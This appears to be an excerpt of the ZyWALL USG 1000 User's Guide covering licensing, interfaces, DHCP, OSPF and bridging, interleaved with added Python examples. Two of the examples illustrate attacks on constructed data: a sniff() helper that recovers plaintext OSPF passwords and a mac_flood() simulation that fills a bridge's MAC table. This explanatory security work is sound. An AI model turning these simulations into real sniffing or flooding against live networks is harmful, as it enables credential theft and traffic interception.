Page 265: ...L.com. myZyXEL.com is ZyXEL's online services center where you can register your ZyWALL and manage subscription services available for the ZyWALL. To update signature files or use a subscription service, you have to register the ZyWALL and activate the corresponding service at myZyXEL.com through the ZyWALL. Note: You need to create a myZyXEL.com account before you can register your device and activate...

Page 266: ...not a separate trial period for each anti-virus engine. After the trial expires, you need to purchase an iCard for the anti-virus engine you want to use and enter the PIN number (license key) in the Registration > Service screen. You must use the ZyXEL anti-virus iCard for the ZyXEL anti-virus engine and the Kaspersky anti-virus iCard for the Kaspersky anti-virus engine. If you were already using an iCard...

Page 267: ...lds are available. new myZyXEL.com account: If you haven't created an account at myZyXEL.com, select this option and configure the following fields to create an account and register your ZyWALL. existing myZyXEL.com account: If you already have an account at myZyXEL.com, select this option and enter your user name and password in the fields below to register your ZyWALL. UserName: Enter a user name for yo...

Page 268: ...e from the update server http://myupdate.zywall.zyxel.com. IDP/AppPatrol Signature Service: The IDP and application patrol features use the IDP/AppPatrol signature files on the ZyWALL. IDP detects malicious or suspicious packets and responds immediately. Application patrol conveniently manages the use of various applications on the network. After the service is activated, the ZyWALL can download the up-to...

Page 269: ...o update your service subscription status. Figure 237 Configuration > Licensing > Registration > Registered Device. 11.3 The Service Screen: Use this screen to display the status of your service registrations and upgrade licenses. To activate or extend a standard service subscription, purchase an iCard and enter the iCard's PIN number (license key) in this screen. Click Configuration > Licensing > Registration > Serv...

Page 270: ...nti-virus service subscription, this field also displays the type of anti-virus engine. Expiration date: This field displays the date your service expires. You can continue to use IDP/AppPatrol or Anti-Virus after the registration expires; you just won't receive updated signatures, so detection of threats newer than the last signature set you downloaded stops. Count: This field displays how many VPN tunnels you can use with your current license. This field does not apply to the other...

Page 271: ...on page 569 for details on IDP. See Chapter 32 on page 527 for details on application patrol. Use the Configuration > Licensing > Update > System Protect screen (Section 12.4 on page 275) to update the system protection signatures. 12.1.2 What You Need to Know: You need a valid service registration to update the anti-virus signatures and the IDP/AppPatrol signatures. You do not need a service registration to u...

Page 272: ...ersion 2.11, and updating the anti-virus signatures automatically upgrades the ZyXEL anti-virus engine to v2.0. v2.0 has more virus signatures and offers improved non-executable file scan throughput. Current Version: This field displays the anti-virus signatures version number currently used by the ZyWALL. This number is defined by the ZyXEL Security Response Team (ZSRT), who maintain and update them. This...

Page 273: ...are found, they are then downloaded to the ZyWALL. Update Now: Click this button to have the ZyWALL check for new signatures immediately. If there are new ones, the ZyWALL will then download them. Auto Update: Select this check box to have the ZyWALL automatically check for new signatures regularly at the time and day specified. You should select a time when your network is not busy for minimal interrupti...

Page 274: ...umber of IDP signatures in this set. This number usually gets larger as the set is enhanced. Older signatures and rules may be removed if they are no longer applicable or have been supplanted by newer ones. Released Date: This field displays the date and time the set was released. Signature Update: Use these fields to have the ZyWALL check for new IDP signatures at myZyXEL.com. If new signatures are foun...

Page 275: ...ystem protection feature is enabled by default and can only be disabled via the commands. You do not need an IDP subscription to use the system protection feature or to download updated system protection signatures. Figure 241 Configuration > Licensing > Update > System Protect. Daily: Select this option to have the ZyWALL check for new IDP signatures every day at the specified time. The time format is the 24...

Page 276: ... these fields to have the ZyWALL check for new signatures at myZyXEL.com. If new signatures are found, they are then downloaded to the ZyWALL. Update Now: Click this button to have the ZyWALL check for new signatures immediately. If there are new ones, the ZyWALL will then download them. Auto Update: Select this check box to have the ZyWALL automatically check for new signatures regularly at the time and...

Page 277: ...icies. RIP and OSPF are also configured in these interfaces. Use the PPP screens (Section 13.4 on page 292) for PPPoE or PPTP Internet connections. Use the Cellular screens (Section 13.5 on page 299) to configure settings for interfaces for Internet connections through an installed 3G card. Use the VLAN screens (Section 13.6 on page 308) to divide the physical network into multiple logical networks. VLAN int...

Page 278: ...ne Ethernet interface. Bridge interfaces create a software connection between Ethernet or VLAN interfaces at the layer 2 (data link, MAC address) level. Unlike port groups, bridge interfaces can take advantage of some security features in the ZyWALL. You can also assign an IP address and subnet mask to the bridge. PPP interfaces support Point-to-Point Protocols (PPP). ISP accounts are required for PPPoE/PPTP...

Page 279: ... interface. Relationships Between Interfaces: In the ZyWALL, interfaces are usually created on top of other interfaces. Only Ethernet interfaces are created directly on top of the physical ports or port groups. The relationships between interfaces are explained in the following table. Table 57 Ethernet, PPP, Cellular, VLAN, Bridge and Virtual Interface Characteristics (CHARACTERISTICS / ETHERNET / PPP / CELLULAR / V...

Page 280: ...information on interfaces. See Section 7.1 on page 117 for an example of configuring Ethernet interfaces, port grouping and zones. See Section 7.2 on page 120 for an example of configuring a cellular (3G) interface. See Chapter 14 on page 337 to configure load balancing using trunks. 13.2 Port Grouping: This section introduces port groups and then explains the screen for port groups. PPP interface, Ethernet...

Page 281: ...to a representative interface, you create a port group. Port groups have the following characteristics: There is a layer 2 Ethernet switch between physical ports in the port group. This provides wire speed throughput but no security: frames switched between ports of the same group never reach the ZyWALL's firewall or other security features, so only place hosts in one port group if they may talk to each other without restriction. It can increase the bandwidth between the port group and other interfaces. 13.2.2 Port Grouping Screen: Define the relationship between physical ports, port groups and Ethern...

Page 282: ...ts exchange routing information with other routers and how much information is exchanged through each one. The more routing information is exchanged, the more efficient the routers should be. However, the routers also generate more network traffic, and some routing protocols require a significant amount of configuration and management. The ZyWALL supports two routing protocols, RIP and OSPF. See Chapter 1...

Page 283: ...click Create Virtual Interface. Object References: Select an entry and click Object References to open a screen that shows which settings use the entry. See Section 13.3.2 on page 291 for an example. #: This field is a sequential value and it is not associated with any interface. Status: This icon is lit when the entry is active and dimmed when the entry is inactive. Name: This field displays the name of the...

Page 284: ... interfaces to do the following things: Enable and disable RIP in the underlying physical port or port group. Select which direction(s) routing information is exchanged. The ZyWALL can receive routing information, send routing information, or do both. Select which version of RIP to support in each direction. The ZyWALL supports RIP-1, RIP-2 and both versions. Select the broadcasting method used by RIP-2 pac...

Page 285: ...Chapter 13 Interfaces, ZyWALL USG 1000 User's Guide 285. Figure 244 Configuration > Network > Interface > Ethernet > Edit ...

Page 286: ...ou must manually configure a policy route to add routing and SNAT settings for the interface. Interface Name: Specify a name for the interface. It can use alphanumeric characters, hyphens and underscores, and it can be up to 11 characters long. Port: This is the name of the Ethernet interface's physical port. Zone: Select the zone to which this interface is to belong. You use zones to apply security setting...

Page 287: ...lowed values are 0 to 1048576. Ingress Bandwidth: This is reserved for future use. Enter the maximum amount of traffic, in kilobits per second, the ZyWALL can receive from the network through the interface. Allowed values are 0 to 1048576. MTU: Maximum Transmission Unit. Type the maximum size of each data packet, in bytes, that can move through this interface. If a larger packet arrives, the ZyWALL divides it into s...

Page 288: ...ere is already a DHCP server on the network. DHCP Relay: the ZyWALL routes DHCP requests to one or more DHCP servers you specify. The DHCP server(s) may be on another network. DHCP Server: the ZyWALL assigns IP addresses and provides subnet mask, gateway and DNS server information to the network. The ZyWALL is the DHCP server for the network. These fields appear if the ZyWALL is a DHCP Relay. Relay Server 1...

Page 289: ...the computer names on your network and the IP addresses that they are currently using. Lease time: Specify how long each computer can use the information (especially the IP address) before it has to request the information again. Choices are: infinite, select this if IP addresses never expire; days, hours and minutes, select this to enter how long IP addresses are valid. Enable IP/MAC Binding: Select this opt...

Page 290: ...packets using subnet broadcasting; otherwise the ZyWALL uses multicasting. OSPF Setting: See Section 16.3 on page 365 for more information about OSPF. Area: Select the area in which this interface belongs. Select None to disable OSPF in this interface. Priority: Enter the priority (between 0 and 255) of this interface when the area is looking for a Designated Router (DR) or Backup Designated Router (BDR). The hi...

Page 291: ...ry-assigned default MAC address. By default, the ZyWALL uses the factory-assigned MAC address to identify itself. Overwrite Default MAC Address: Select this option to have the interface use a different MAC address. Either enter the MAC address in the fields or click Clone by host and enter the IP address of the device or computer whose MAC you are cloning. Once it is successfully configured, the address...

Page 292: ... display the object's configuration screen in the main window. #: This field is a sequential value and it is not associated with any entry. Service: This is the type of setting that references the selected object. Click a service's name to display the service's configuration screen in the main window. Priority: If it is applicable, this field lists the referencing configuration item's position in its list o...

Page 293: ...the protocol (PPPoE or PPTP) as well as your ISP account information. If you change ISPs later, you only have to create a new ISP account, not a new PPPoE/PPTP interface. You should not have to change any network policies. You do not set up the subnet mask or gateway. PPPoE/PPTP interfaces are interfaces between the ZyWALL and only one computer. Therefore, the subnet mask is always 255.255.255.255. In additi...

Page 294: ... it before doing so. Activate: To turn on an entry, select it and click Activate. Inactivate: To turn off an entry, select it and click Inactivate. Connect: To connect an interface, select it and click Connect. You might use this in testing the interface or to manually establish the connection for a Dial-on-Demand PPPoE/PPTP interface. Disconnect: To disconnect an interface, select it and click Disconnect. You...

Page 295: ...an Edit icon in the PPP Interface screen. Name: This field displays the name of the interface. Base Interface: This field displays the interface on top of which the PPPoE/PPTP interface is. Account Profile: This field displays the ISP account used by this PPPoE/PPTP interface. Apply: Click Apply to save your changes back to the ZyWALL. Reset: Click Reset to return the screen to its last saved settings. T...

Page 296: ... Network > Interface > PPP > Add. Each field is explained in the following table. Table 64 Configuration > Network > Interface > PPP > Add (LABEL / DESCRIPTION). Show Advance Settings / Hide Advance Settings: Click this button to display a greater or lesser number of configuration fields. General Settings ...

Page 297: ...nection available. ISP Setting. Account Profile: Select the ISP account that this PPPoE/PPTP interface uses. The drop-down box lists ISP accounts by name. Use Create new Object if you need to configure a new ISP account (see Chapter 47 on page 771 for details). Protocol: This field is read-only. It displays the protocol specified in the ISP account. User Name: This field is read-only. It displays the user name...

Page 298: ...ect this to turn on the connection check. Check Method: Select the method that the gateway allows. Select icmp to have the ZyWALL regularly ping the gateway you specify to make sure it is still available. Select tcp to have the ZyWALL regularly perform a TCP handshake with the gateway you specify to make sure it is still available. Check Period: Enter the number of seconds between connection check attem...

Page 299: ...o users when they send data. It allows fast transfer of voice and non-voice data and provides broadband Internet access to mobile devices. Note: The actual data rate you obtain varies depending on the 3G card you use, the signal strength to the service provider's base station, and so on. OK: Click OK to save your changes back to the ZyWALL. Cancel: Click Cancel to exit this screen without saving. Table 64 C...

Page 300: ...a hybrid 2.5G/3G protocol of mobile telecommunications standards that use CDMA, a multiple access scheme for digital radio. CDMA2000 1xRTT (1 times Radio Transmission Technology) is the core CDMA2000 wireless air interface standard. It is also known as 1x, 1xRTT or IS-2000 and is considered to be a 2.5G or 2.75G technology. 2.75G: Packet-switched Enhanced Data rates for GSM Evolution (EDGE), Enhanced GPRS (EGPRS)...

Page 301: ...select it and click Connect. You might use this in testing the interface or to manually establish the connection. Disconnect: To disconnect an interface, select it and click Disconnect. You might use this in testing the interface. Object References: Select an entry and click Object References to open a screen that shows which settings use the entry. See Section 13.3.2 on page 291 for an example. #: This field...

Page 302: ...Figure 250 Configuration > Network > Interface > Cellular > Add ...

Page 303: ...y. Nailed-Up: Select this if the connection should always be up. Clear this to have the ZyWALL establish the connection only when there is traffic. You might not nail up the connection if there is little traffic through the interface or if it costs money to keep the connection available. Idle timeout: This value specifies the time in seconds (0 to 360) that elapses before the ZyWALL automatically disconne...

Page 304: ...es are not allowed. Password: This field displays when you select an authentication type other than None. This field is read-only if you selected Device in the profile selection and the password is included in the 3G card's profile. If this field is configurable, enter the password for this SIM card exactly as the service provider gave it to you. You can use 0 to 63 alphanumeric and _ characters. Spaces are...

Page 305: ...n on the connection check. Check Method: Select the method that the gateway allows. Select icmp to have the ZyWALL regularly ping the gateway you specify to make sure it is still available. Select tcp to have the ZyWALL regularly perform a TCP handshake with the gateway you specify to make sure it is still available. Check Period: Enter the number of seconds between connection check attempts. Check Timeo...

Page 306: ...fy the type of network to use if you are charged differently for different types of network or you only have one type of network available to you. Select GPRS/EDGE (GSM) only to have this interface only use a 2.5G or 2.75G network, respectively. If you only have a GSM network available to you, you may want to select this so the ZyWALL does not spend time looking for a WCDMA network. Select UMTS/HSDPA (WCD...

Page 307: ... time or data limit is exceeded. Log: Select None to not create a log, Log to create a log, or Log alert to create an alert log. If you select Log or Log alert, you can also select recurring every to have the ZyWALL send a log or alert for this event periodically. Specify how often (from 1 to 65535 minutes) to send the log or alert. New 3G connection: Select Allow to permit new 3G connections or Disallow to...

Page 308: ...mple, there are two physical networks and three departments, A, B and C. The physical networks are connected to hubs, and the hubs are connected to the router. Alternatively, you can divide the physical networks into three VLANs. Figure 252 Example: After VLAN. OK: Click OK to save your changes back to the ZyWALL. Cancel: Click Cancel to exit this screen without saving. Table 67 Configuration > Network > Interface ...

Page 309: ...rs. Higher security: If each computer has a separate physical connection to the switch, then broadcast traffic in each VLAN is never sent to computers in another VLAN. Better manageability: You can align network policies more appropriately for users. For example, you can create different content filtering rules for each VLAN (each department in the example above), and you can set different bandwidth limits...

Page 310: ...ick Remove. The ZyWALL confirms you want to remove it before doing so. Activate: To turn on an entry, select it and click Activate. Inactivate: To turn off an entry, select it and click Inactivate. Create Virtual Interface: To open the screen where you can create a virtual interface, select an interface and click Create Virtual Interface. Object References: Select an entry and click Object References to open...

Page 311: ... appears. IP Address: This field displays the current IP address of the interface. If the IP address is 0.0.0.0, the interface does not have an IP address yet. This screen also shows whether the IP address is a static IP address (STATIC) or dynamically assigned (DHCP). IP addresses are always static in virtual interfaces. Mask: This field displays the interface's subnet mask in dot decimal notation. Apply: Clic...

Page 312: ...Figure 254 Configuration > Network > Interface > VLAN > Edit ...

Page 313: ...4095 are reserved. Description: Enter a description of this interface. It is not used elsewhere. You can use alphanumeric and _ characters, and it can be up to 60 characters long. IP Address Assignment. Get Automatically: Select this if this interface is a DHCP client. In this case, the DHCP server configures the IP address, subnet mask and gateway automatically. You should not select this if the interface is...

Page 314: ...a failure and how many consecutive failures are required before the ZyWALL stops routing to the gateway. The ZyWALL resumes routing to the gateway the first time the gateway passes the connectivity check. Enable Connectivity Check: Select this to turn on the connection check. Check Method: Select the method that the gateway allows. Select icmp to have the ZyWALL regularly ping the gateway you specify to...

Page 315: ...ress, broadcast address and the interface's IP address. Pool Size: Enter the number of IP addresses to allocate. This number must be at least one and is limited by the interface's Subnet Mask. For example, if the Subnet Mask is 255.255.255.0 and IP Pool Start Address is 10.10.10.10, the ZyWALL can allocate 10.10.10.10 to 10.10.10.254, or 245 IP addresses. If this field is blank, the IP Pool Start Address mu...
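An added check, not ZyXEL's code, that reproduces the Pool Size limit worked above and the rule that the pool must not contain the network address, the broadcast address or the interface's own IP. It uses Python's standard ipaddress module; the function names and the sample values are assumptions for the example.

```python
"""DHCP pool sizing and overlap check for a DHCP Server interface. Added example,
not ZyXEL code. Reproduces the guide's example: mask 255.255.255.0 and pool start
10.10.10.10 allow at most 245 addresses (10.10.10.10 .. 10.10.10.254)."""
import ipaddress
from typing import List


def max_pool_size(pool_start: str, subnet_mask: str) -> int:
    """Largest Pool Size from pool_start: every address up to, but excluding, broadcast."""
    net = ipaddress.ip_network(f"{pool_start}/{subnet_mask}", strict=False)
    start = ipaddress.ip_address(pool_start)
    if start in (net.network_address, net.broadcast_address):
        raise ValueError(f"{pool_start} is the network or broadcast address of {net}")
    return int(net.broadcast_address) - int(start)


def check_pool(interface_ip: str, subnet_mask: str, pool_start: str, pool_size: int) -> List[str]:
    """Return the list of problems with a proposed pool; an empty list means it is valid."""
    problems: List[str] = []
    net = ipaddress.ip_network(f"{interface_ip}/{subnet_mask}", strict=False)
    start = ipaddress.ip_address(pool_start)
    # The start must be a usable host address inside the interface's own subnet.
    if start not in net or start in (net.network_address, net.broadcast_address):
        return [f"pool start {pool_start} is not a usable host address in {net}"]
    if pool_size < 1:
        problems.append("Pool Size must be at least 1")
    limit = max_pool_size(pool_start, subnet_mask)
    if pool_size > limit:
        problems.append(
            f"Pool Size {pool_size} exceeds the {limit} addresses available from {pool_start} in {net}"
        )
    # The pool may not hand out the interface's own address to a client.
    end = ipaddress.ip_address(int(start) + max(pool_size, 1) - 1)
    iface = ipaddress.ip_address(interface_ip)
    if start <= iface <= end:
        problems.append(f"interface address {interface_ip} falls inside the pool {start}-{end}")
    return problems
```

Run check_pool before committing a DHCP Server configuration; a pool that swallows the interface address hands a client the gateway's own IP, and a pool larger than the subnet silently stops short of the size you typed.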

Page 316: ... able to modify it. Remove: Select an entry and click this to delete it. #: This field is a sequential value and it is not associated with a specific entry. IP Address: Enter the IP address to assign to a device with this entry's MAC address. MAC Address: Enter the MAC address to which to assign this entry's IP address. Description: Enter a description to help identify this static DHCP entry. You can use alpha...

Page 317: ...method in the area. None: disable authentication. Text: authenticate OSPF routing information using a plain text password; the password is carried in the clear in every OSPF packet, so anyone on the segment can read it. MD5: authenticate OSPF routing information using a keyed MD5 digest. MD5 authentication shows that a packet came from a holder of the shared key and was not altered in transit, but it does not encrypt the routing information, which remains readable on the wire. Text Authentication Key: This field is available if the Authentication is Text. Type the password for text authentication. The key can consist of alphanumeric characters and the underscore, and it can be up to eight charact...
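To make the Text versus MD5 difference concrete, here is an added example that is not ZyXEL's code: it builds a minimal OSPFv2 Hello under each authentication type following the packet layout of RFC 2328 Appendix D (plain text: the 8-byte password sits in the Authentication field; MD5: the field carries a key ID, digest length and sequence number, and MD5 over the packet plus the 16-byte padded key trails the packet) and shows what a passive listener recovers. The router ID, area, password, key and Hello contents are constructed values; the sequence-number replay check a real router performs is omitted.

```python
"""Text (AuType 1) versus MD5 (AuType 2) OSPF authentication, RFC 2328 Appendix D.
Added example, not ZyXEL code; router IDs, keys and Hello values are constructed."""
import hashlib
import hmac
import struct

OSPF_HEADER = "!BBHIIHH8s"  # version, type, length, router ID, area ID, checksum, AuType, auth
HELLO = 1


def _internet_checksum(data: bytes) -> int:
    """One's-complement checksum carried in the OSPF header for AuType 0 and 1."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _pad(secret: str, size: int) -> bytes:
    """Keys are fixed-width: truncate or zero-pad the configured string."""
    return secret.encode()[:size].ljust(size, b"\x00")


def hello_body(netmask: str, hello_interval: int = 10, dead_interval: int = 40) -> bytes:
    """Minimal Hello: mask, HelloInterval, options, priority, RouterDeadInterval, DR, BDR."""
    mask = int.from_bytes(bytes(int(octet) for octet in netmask.split(".")), "big")
    return struct.pack("!IHBBIII", mask, hello_interval, 0x02, 1, dead_interval, 0, 0)


def build_plaintext(body: bytes, router_id: int, area_id: int, password: str) -> bytes:
    """AuType 1: the password itself is placed in the 8-byte Authentication field."""
    length = 24 + len(body)
    no_auth = struct.pack(OSPF_HEADER, 2, HELLO, length, router_id, area_id, 0, 1, b"\x00" * 8)
    csum = _internet_checksum(no_auth[:16] + body)  # checksum skips the 64-bit auth field
    return struct.pack(OSPF_HEADER, 2, HELLO, length, router_id, area_id, csum, 1, _pad(password, 8)) + body


def verify_plaintext(wire: bytes, password: str) -> bool:
    hdr = struct.unpack(OSPF_HEADER, wire[:24])
    length = hdr[2]
    csum_ok = _internet_checksum(wire[:12] + b"\x00\x00" + wire[14:16] + wire[24:length]) == hdr[5]
    return csum_ok and hmac.compare_digest(hdr[7], _pad(password, 8))


def build_md5(body: bytes, router_id: int, area_id: int, key: str, key_id: int, seq: int) -> bytes:
    """AuType 2: auth field = 0, key ID, digest length 16, sequence number; checksum left 0;
    MD5(packet || padded key) is appended after the packet and not counted in Length."""
    auth = struct.pack("!HBBI", 0, key_id, 16, seq)
    length = 24 + len(body)
    packet = struct.pack(OSPF_HEADER, 2, HELLO, length, router_id, area_id, 0, 2, auth) + body
    return packet + hashlib.md5(packet + _pad(key, 16)).digest()


def verify_md5(wire: bytes, key: str) -> bool:
    length = struct.unpack("!H", wire[2:4])[0]
    packet, digest = wire[:length], wire[length:length + 16]
    return hmac.compare_digest(hashlib.md5(packet + _pad(key, 16)).digest(), digest)


def sniff(wire: bytes) -> dict:
    """What a passive listener on the segment recovers, whichever AuType is in use."""
    _, _, _, router_id, area_id, _, autype, auth = struct.unpack(OSPF_HEADER, wire[:24])
    netmask = struct.unpack("!I", wire[24:28])[0]
    return {
        "router_id": router_id,
        "area": area_id,
        "netmask": netmask,
        "password": auth.rstrip(b"\x00").decode() if autype == 1 else None,
    }
```

With Text authentication, sniff() hands back the password; with MD5 it does not, yet the router ID, area and network mask are still in the clear, which is why MD5 is an integrity and origin check rather than confidentiality. Every router in the area must hold the same key, so rotate it on all of them together.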

Page 318: ... table. It also looks up the destination MAC address in the table. If the bridge knows on which port the destination MAC address is located, it sends the packet to that port. If the destination MAC address is not in the table, the bridge broadcasts the packet on every port except the one on which it was received. In the example above, computer A sends a packet to computer B. Bridge X records the source ad...
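The learning and forwarding rule just described, as an added example that is not ZyXEL's code. It goes beyond the page in two ways: a frame whose destination is behind the port it arrived on is filtered rather than forwarded, and the table has a fixed capacity, which is the property a MAC-flooding attacker abuses: once the table is full, new hosts cannot be learned and their traffic is flooded to every port, including the attacker's. Port names, MAC labels and the capacity are constructed.

```python
"""Transparent learning bridge, as the Bridge Interface section describes it,
with a bounded forwarding table. Added example, not ZyXEL code."""
from typing import Dict, List


class LearningBridge:
    def __init__(self, ports: List[str], max_entries: int = 1024):
        self.ports = list(ports)
        self.max_entries = max_entries
        self.table: Dict[str, str] = {}  # source MAC -> port it was last seen on

    def learn(self, mac: str, port: str) -> bool:
        """Record which port a MAC lives on. A full table refuses new MACs; the
        frame is still forwarded, but nothing is learned about its sender."""
        if mac in self.table or len(self.table) < self.max_entries:
            self.table[mac] = port
            return True
        return False

    def forward(self, in_port: str, src_mac: str, dst_mac: str) -> List[str]:
        """Return the ports the frame is sent out of: the learned port for a known
        destination, nothing if that port is the ingress, every other port otherwise."""
        self.learn(src_mac, in_port)
        known = self.table.get(dst_mac)
        if known is None:
            return [p for p in self.ports if p != in_port]  # unknown: flood
        if known == in_port:
            return []  # destination is behind the port the frame came from: filter
        return [known]


def mac_flood(bridge: LearningBridge, attacker_port: str, count: int) -> int:
    """Simulate an attacker sending frames with fresh bogus source MACs.
    Returns how many of them the bridge actually learned."""
    learned = 0
    for i in range(count):
        before = len(bridge.table)
        bridge.forward(attacker_port, f"bogus-{i:04x}", "ff:ff:ff:ff:ff:ff")
        learned += len(bridge.table) - before
    return learned
```

The first three forward() calls replay the page's A-to-B example; mac_flood() then fills the table from a third port, after which a new host's traffic to a not-yet-learned destination is flooded to the attacker's port as well. On a real bridge, entries also age out, so a sustained flood eventually pushes legitimate hosts into the same state.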

Page 319: ...aces: Any number of Ethernet interfaces and any associated virtual Ethernet interfaces. When you create a bridge interface, the ZyWALL removes the members' entries from the routing table and adds the bridge interface's entries to the routing table. For example, this table shows the routing table before and after you create bridge interface br0 (250.250.250.0/23) between ge1 and vlan1. In this example, virtu...

Page 320: ... where you can create a virtual interface, select an interface and click Create Virtual Interface. Object References: Select an entry and click Object References to open a screen that shows which settings use the entry. See Section 13.3.2 on page 291 for an example. #: This field is a sequential value and it is not associated with any interface. Status: This icon is lit when the entry is active and dimmed w...

Page 321: ...nfigure IP address assignment, interface bandwidth parameters, DHCP settings and connectivity check for each bridge interface. To access this screen, click the Add icon at the top of the Add column in the Bridge Summary screen, or click an Edit icon in the Bridge Summary screen. The following screen appears ...

Page 322: ...Figure 256 Configuration > Network > Interface > Bridge > Add ...

Page 323: ...f the bridge interface. An interface is not available in the following situations: There is a virtual interface on top of it. It is already used in a different bridge interface. Select one and click the arrow to add it to the bridge interface. Each bridge interface can only have one VLAN interface. Member: This field displays the interfaces that are part of the bridge interface. Select one and click the a...

Page 324: ...6. Ingress Bandwidth: This is reserved for future use. Enter the maximum amount of traffic, in kilobits per second, the ZyWALL can receive from the network through the interface. Allowed values are 0 to 1048576. MTU: Maximum Transmission Unit. Type the maximum size of each data packet, in bytes, that can move through this interface. If a larger packet arrives, the ZyWALL divides it into smaller fragments. Allowed ...

Page 325: ...that another interface received from its DHCP server. ZyWALL: the DHCP clients use the IP address of this interface and the ZyWALL works as a DNS relay. First WINS Server, Second WINS Server: Type the IP address of the WINS (Windows Internet Naming Service) server that you want to send to the DHCP clients. The WINS server keeps a mapping table of the computer names on your network and the IP addresses tha...

Page 326: ...onnectivity check. Enable Connectivity Check: Select this to turn on the connection check. Check Method: Select the method that the gateway allows. Select icmp to have the ZyWALL regularly ping the gateway you specify to make sure it is still available. Select tcp to have the ZyWALL regularly perform a TCP handshake with the gateway you specify to make sure it is still available. Check Period: Enter the n...
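The connectivity check behaviour is described identically for the PPP (page 298), cellular (page 305), VLAN (page 314) and bridge (page 326) screens, and page 314 spells out the rule: a reply that arrives after the timeout counts as a failure, routing to the gateway stops only after the configured number of consecutive failures, and it resumes on the first successful check. This added example, not ZyXEL's code, implements that state machine and feeds it constructed probe results; the class and field names are assumptions, and the tcp probe helper only does anything on a live network.

```python
"""Gateway connectivity check (Check Period / Check Timeout / Check Fail Tolerance)
as a state machine fed with probe results. Added example, not ZyXEL code."""
import socket
import time
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class ConnectivityCheck:
    check_timeout: float = 5.0   # seconds to wait for a reply before calling the probe failed
    fail_tolerance: int = 5      # consecutive failures before routing to the gateway stops
    consecutive_failures: int = 0
    routing_enabled: bool = True
    transitions: List[str] = field(default_factory=list)  # "down"/"up" events, for logging

    def record(self, reply_seconds: Optional[float]) -> bool:
        """Feed one probe result: None for no reply, otherwise the round-trip time.
        Returns whether the gateway is still used for routing after this probe."""
        if reply_seconds is not None and reply_seconds <= self.check_timeout:
            self.consecutive_failures = 0        # a single success clears the failure run
            if not self.routing_enabled:
                self.transitions.append("up")    # resumes on the first passing check
            self.routing_enabled = True
        else:
            self.consecutive_failures += 1       # late replies count as failures
            if self.routing_enabled and self.consecutive_failures >= self.fail_tolerance:
                self.routing_enabled = False
                self.transitions.append("down")
        return self.routing_enabled


def replay(results, fail_tolerance: int = 3, check_timeout: float = 5.0) -> List[bool]:
    """Run a sequence of probe results through a fresh check; returns routing state per probe."""
    check = ConnectivityCheck(check_timeout=check_timeout, fail_tolerance=fail_tolerance)
    return [check.record(r) for r in results]


def tcp_probe(gateway: str, port: int, timeout: float) -> Optional[float]:
    """Check Method 'tcp': complete a TCP handshake with the gateway and return the
    round-trip time, or None on failure. ICMP would need a raw socket (root), so it
    is not implemented here. Live network only; not exercised by the test."""
    start = time.monotonic()
    try:
        with socket.create_connection((gateway, port), timeout=timeout):
            return time.monotonic() - start
    except OSError:
        return None
```

Pick Check Period and Check Fail Tolerance together: the product of the two is how long a dead gateway keeps receiving traffic before failover, while a tolerance of one makes a single lost probe flap the route.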

Page 327: ... use the auxiliary interface. Note: You have to connect an external modem to the auxiliary port. The ZyWALL uses the auxiliary interface to dial out in two situations: 1. You click the Connect icon on the ZyWALL Status screen. 2. The auxiliary interface must connect to satisfy load balancing requirements. You have to add the auxiliary interface to a trunk first. When the ZyWALL hangs up the call, it dr...

Page 328: ... is read-only and displays the zone to which the auxiliary interface belongs. Description: Enter a description of this interface. It is not used elsewhere. You can use alphanumeric and _ characters, and it can be up to 60 characters long. Port Speed: Select the speed of the connection between the ZyWALL and external computer. Dialing Type: Tone, select this if the telephone uses tone-based dialing; Pulse, sel...

Page 329: ... comma to pause during dialing. Use a plus sign to tell the external modem to make an international call. User Name: Enter the user name required for authentication. Password: Enter the password required for authentication. Retype to confirm: Enter the password again to make sure you have not typed it incorrectly. Authentication Type: Select the authentication protocol to use for outgoing calls. Choices are...

Page 330: ...ration > Network > Interface > Add (LABEL / DESCRIPTION). Interface Properties. Interface Name: This field is read-only. It displays the name of the virtual interface, which is automatically derived from the underlying Ethernet interface, VLAN interface or bridge interface. Description: Enter a description of this interface. It is not used elsewhere. You can use alphanumeric and _ characters, and it can be up to 60 ch...

Page 331: ...ways have the same priority, the ZyWALL uses the one that was configured first. Interface Parameters. Egress Bandwidth: Enter the maximum amount of traffic, in kilobits per second, the ZyWALL can send through the interface to the network. Allowed values are 0 to 1048576. Ingress Bandwidth: This is reserved for future use. Enter the maximum amount of traffic, in kilobits per second, the ZyWALL can receive from th...

Page 332: ...t with a destination address of 5.5.5.5, it might not find any entries in the routing table. In this case, the packet is dropped. However, if there is a default router to which the ZyWALL should send this packet, you can specify it as a gateway in one of the interfaces. For example, if there is a default router at 200.200.200.100, you can create a gateway at 200.200.200.100 on ge2. In this case, the ZyWALL c...

Page 333: ...ddresses, subnet masks, gateways and some network information (such as the IP addresses of DNS servers) on computers in the network. This reduces the amount of manual configuration you have to do and usually uses available IP addresses more efficiently. In DHCP, every network has at least one DHCP server. When a computer (a DHCP client) joins the network, it submits a DHCP request. The DHCP servers get the re...

Page 334: ...ace provides the same gateway you specify for the interface. See IP Address Assignment on page 331. DNS servers: The interface provides IP addresses for up to three DNS servers that provide DNS services for DHCP clients. You can specify each IP address manually (for example, a company's own DNS server), or you can refer to DNS servers that other interfaces received from DHCP servers (for example, a DNS serv...

Page 335: ...g systems, including RADIUS. You can access one of several network services. This makes it easier for the service provider to offer the service. PPPoE does not usually require any special configuration of the modem. PPTP is used to set up virtual private networks (VPN) in insecure TCP/IP environments. It sets up two sessions: 1. The first one runs on TCP port 1723. It is used to start and manage the second o...


Page 337: ...ia. You could use policy routes and trunks to have traffic for your European branch office primarily use ISP A and traffic for your Australian branch office primarily use ISP B. Or maybe one of the ZyWALL's interfaces is connected to an ISP that is also your Voice over IP (VoIP) service provider. You can use policy routing to send the VoIP traffic through a trunk with the interface connected to the VoI...

Page 338: ...pes through the best WAN interface for that type of traffic. If that interface's connection goes down, the ZyWALL can still send its traffic through another interface. You can define multiple trunks for the same physical interfaces. Link Sticking: You can have the ZyWALL send each local computer's traffic that is going to the same destination through a single WAN interface for a specified period of tim...

Page 339: ...ed bandwidth refers to the bandwidth an interface is currently using. Least Load First: The least load first algorithm uses the current (or recent) outbound bandwidth utilization of each trunk member interface as the load balancing index(es) when making decisions about to which interface a new session is to be distributed. The outbound bandwidth utilization is defined as the measured outbound throughput...

